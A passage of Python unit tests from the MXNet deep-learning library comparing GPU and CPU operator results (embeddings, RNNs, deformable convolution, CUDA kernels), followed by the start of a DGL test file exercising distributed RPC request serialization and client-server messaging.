{'ctx': mx.cpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/8288")
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='lstm', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(100, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed(1234)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_psroipooling_with_type():
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_convolution_with_type():
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 10, 10),
# 'deformable_conv_offset': (2, 18, 8, 8),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'}, tol=tol)
@with_seed()
def test_deformable_convolution_options():
# 2D convolution
# Pad > 0
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_offset': (2, 18, 7, 7),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list)
# Stride > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Dilate > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Deformable group > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 36, 5, 5),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
name='deformable_conv')
@with_seed()
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_rnn_layer():
check_rnn_layer(gluon.rnn.RNN(100, num_layers=3))
check_rnn_layer(gluon.rnn.RNN(100, activation='tanh', num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3))
check_rnn_layer(gluon.rnn.GRU(100, num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
check_rnn_layer_w_rand_inputs(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@unittest.skip("Test fails intermittently. Temporarily disabled until fixed. Tracked at https://github.com/apache/incubator-mxnet/issues/8211")
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_gluon_ctc_consistency():
loss = mx.gluon.loss.CTCLoss()
data = mx.nd.arange(0, 4, repeat=40, ctx=mx.gpu(0)).reshape((2,20,4)).flip(axis=0)
cpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.cpu(0))
gpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.gpu(0))
cpu_data = data.copy().as_in_context(mx.cpu(0))
cpu_data.attach_grad()
with mx.autograd.record():
l_cpu = loss(cpu_data, cpu_label)
l_cpu.backward()
gpu_data = data.copyto(mx.gpu(0))
gpu_data.attach_grad()
with mx.autograd.record():
l_gpu = loss(gpu_data, gpu_label)
l_gpu.backward()
assert_almost_equal(cpu_data.grad.asnumpy(), gpu_data.grad.asnumpy(), atol=1e-3, rtol=1e-3)
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_global_norm_clip_multi_device():
x1 = mx.nd.ones((3,3), ctx=mx.gpu(0))
x2 = mx.nd.ones((4,4), ctx=mx.cpu(0))
norm = gluon.utils.clip_global_norm([x1, x2], 1.0)
assert norm == 5.0
assert_almost_equal(x1.asnumpy(), np.ones((3,3))/5)
assert_almost_equal(x2.asnumpy(), np.ones((4,4))/5)
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@unittest.skip("JIRA issue: https://issues.apache.org/jira/projects/MXNET/issues/MXNET-130")
@with_seed()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_score = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_score = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 20)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
if __name__ == '__main__':
import nose
nose.runmodule()
|
test_rpc.py | import os
import time
import socket
import dgl
import backend as F
import unittest, pytest
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
INTEGER = 2
STR = 'hello world!'
HELLO_SERVICE_ID = 901231
TENSOR = F.zeros((10, 10), F.int64, F.cpu())
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
def foo(x, y):
assert x == 123
assert y == "abc"
class MyRequest(dgl.distributed.Request):
def __init__(self):
self.x = 123
self.y = "abc"
self.z = F.randn((3, 4))
self.foo = foo
def __getstate__(self):
return self.x, self.y, self.z, self.foo
def __setstate__(self, state):
self.x, self.y, self.z, self.foo = state
def process_request(self, server_state):
pass
class MyResponse(dgl.distributed.Response):
def __init__(self):
self.x = 432
def __getstate__(self):
return self.x
def __setstate__(self, state):
self.x = state
def simple_func(tensor):
return tensor
class HelloResponse(dgl.distributed.Response):
def __init__(self, hello_str, integer, tensor):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
def __getstate__(self):
return self.hello_str, self.integer, self.tensor
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor = state
class HelloRequest(dgl.distributed.Request):
def __init__(self, hello_str, integer, tensor, func):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
self.func = func
def __getstate__(self):
return self.hello_str, self.integer, self.tensor, self.func
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor, self.func = state
def process_request(self, server_state):
assert self.hello_str == STR
assert self.integer == INTEGER
new_tensor = self.func(self.tensor)
res = HelloResponse(self.hello_str, self.integer, new_tensor)
return res
def start_server():
server_state = dgl.distributed.ServerState(None, local_g=None, partition_book=None)
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.start_server(server_id=0,
ip_config='rpc_ip_config.txt',
num_clients=1,
server_state=server_state)
def start_client():
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.connect_to_server(ip_config='rpc_ip_config.txt')
req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
# test send and recv
dgl.distributed.send_request(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test send_request_to_machine
dgl.distributed.send_request_to_machine(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call_to_machine
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call_to_machine(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# clean up
dgl.distributed.shutdown_servers()
dgl.distributed.finalize_client()
def test_serialize():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload
SERVICE_ID = 12345
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
req1 = deserialize_from_payload(MyRequest, data, tensors)
req1.foo(req1.x, req1.y)
assert req.x == req1.x
assert req.y == req1.y
assert F.array_equal(req.z, req1.z)
res = MyResponse()
data, tensors = serialize_to_payload(res)
res1 = deserialize_from_payload(MyResponse, data, tensors)
assert res.x == res1.x
def test_rpc_msg():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage
SERVICE_ID = 32452
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors)
assert rpcmsg.service_id == SERVICE_ID
assert rpcmsg.msg_seq == 23
assert rpcmsg.client_id == 0
assert rpcmsg.server_id == 1
assert len(rpcmsg.data) == len(data)
assert len(rpcmsg.tensors) == 1
assert F.array_equal(rpcmsg.tensors[0], req.z)
